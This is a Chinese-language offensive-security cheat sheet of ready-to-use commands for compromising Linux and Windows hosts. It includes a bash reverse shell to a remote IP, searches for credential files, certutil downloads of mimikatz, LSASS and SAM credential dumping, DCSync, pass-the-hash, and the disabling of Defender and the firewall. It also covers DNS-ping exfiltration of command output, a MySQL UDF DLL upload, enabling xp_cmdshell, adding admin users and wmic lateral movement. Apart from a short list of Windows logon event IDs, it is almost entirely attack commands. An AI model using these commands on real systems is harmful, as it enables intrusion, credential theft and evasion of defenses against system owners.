Linux一句话反弹

bash -i >& /dev/tcp/192.168.1.123/12345 0>&1

Linux敏感文件搜索

find / -name *.properties 2>/dev/null | grep WEB-INF
find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_" find / -regex ".*\.properties\|.*\.conf\|.*\.config" | xargs grep -E "=jdbc:|pass="

find /webapp -regex ".*\.properties" -print 2>/dev/null | xargs grep -E "=jdbc:|rsync"

find / -regex ".*\.properties" -print  2>/dev/null
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.sh" | xargs grep -E "=jdbc:|pass=|passwd="
grep -r 'setCipherKey(Base64.decode(' /web路径
find / -regex ".*\.xml\|.*\.properties\|.*\.conf\|.*\.config\|.*\.jsp" | xargs grep -E "setCipherKey"

Linux保存shell

#创建新的会话
tmux new -s ccc
#查看会话
tmux ls
#进入会话
tmux a -t ccc
#删除会话
tmux kill-session -t ccc

Linux建立交互shell


# 在反向shell内通过python一句话fork个bash
python -c 'import pty; pty.spawn("/bin/bash")'

#挂起反向shell #本步骤基本实现普通交互shell
Ctrl-Z
echo $TERM    #记录$term变量 #xterm
stty -a      #记录stty配置 #可忽略 #rows 39; columns 153; 
stty raw -echo 
fg        #通过fg取回挂起的nc #fg不输出 #运行后回车乱码显示

开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

mimikatz读取rdp密码

"privilege::debug" "sekurlsa::dpapi" "log" "dpapi::cred /in:C:/Users/Administrator/AppData/Local/Microsoft/Credentials/xxxx" "exit"

查看远程桌面端口:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

锁屏:

rundll32.exe user32.dll,LockWorkStation

远程下载:

certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe
certutil.exe && certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe    //bypass

修改WDigest存储明文:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

关闭defender:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD

#C:\tmp加白名单#
powershell -Command Add-MpPreference -ExclusionPath "C:\tmp" 

https://docs.microsoft.com/fr-fr/powershell/module/defender/add-mppreference?view=win10-ps

防火墙:

netsh advfirewall set allprofiles state off

netsh advfirewall set allprofiles state on

读取wifi密码:

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

远程桌面保存凭据:

cmdkey /list

pth

FOR /F %i in (ips.txt) do net use \\%i\ipc$ "admin!@#45" /user:administrator

无回显Linux:

ping `hostname`.xxx.win
ping `id`.xxx.win
ping $(whoami).xxx.win 

无回显Windows:

cmd /c for /f %x in ('hostname') do ping -n 1 %x.xxx.win
cmd /c for /f %x in ('whoami') do ping -n 1 %x.xxx.win
ping %USERNAME%.avfisher.win -n 1

添加用户:

net user name password /add
net localgroup administrators name /add
net user name /delete

域内信息收集:

net user /domain //获取域用户列表
net group /domain  //查询域内所有用户组列表
net group “Domain Admins” /domain //查询域管理员用户
net group "Domain Controllers" /domain  //查看域控制器
net localgroup administrators /domain  //查询域内置本地管理员组用户

dir /s /a \\域控\sysvol\*.xml

mimikatz:

privilege::debug
sekurlsa::logonpassword(s)
lsadump::dcsync /domain:test.com /all /csv
xcopy mimikatz \\admin-pc\c$\temp 

reg mimikatz:

reg save HKLM\SYSTEM D:\sys.hiv
reg save HKLM\SAM D:\sam.hiv
lsadump::sam /sam:sam.hiv /system:sys.hiv

powershell允许执行脚本:

Set-ExecutionPolicy RemoteSigned

pth:

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7

sekurlsa::pth /user:administrator /domain:xxx /ntlm:xxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin"    //desktop

frp:

[common]
server_addr = xxx
server_port = xxx
token = xxx

[plugin_socks5]
type = tcp
remote_port = xxxx
plugin = socks5
plugin_user = xxx
plugin_passwd = xx

powershell弹框:

Add-Type -AssemblyName Microsoft.VisualBasic; [Microsoft.VisualBasic.Interaction]::MsgBox("xxxxx", "OKOnly,MsgBoxSetForeground,SystemModal,Exclamation", "")

mysql-udf:

show variables like "sec%"
show variables like 'plugin%';  
create table temp(data longblob);
insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
select data from temp into dumpfile "G:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf.dll";
create function sys_eval returns string soname 'udf.dll';   #创建函数sys_eval

mssql xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

exec master..xp_cmdshell 'net user test super123. /add'    

登陆日志id

4624    登录成功
4625    登录失败
4634    注销成功
4647    用户启动的注销
4672    使用超级用户/管理员用户进行登录
4720    创建用户
4697 7045    PsExec

ssp

#修改注册表
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "mimilib1.dll" /t REG_MULTI_SZ /f
#mimikatz注入
privilege::debug
misc::memssp

springboot内存泄露

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

wmic横向

wmic /node:"192.168.1.1" /password:"****" /user:"workgroup\xxxxx" process call create "cmd.exe /c xxxxx'"
目录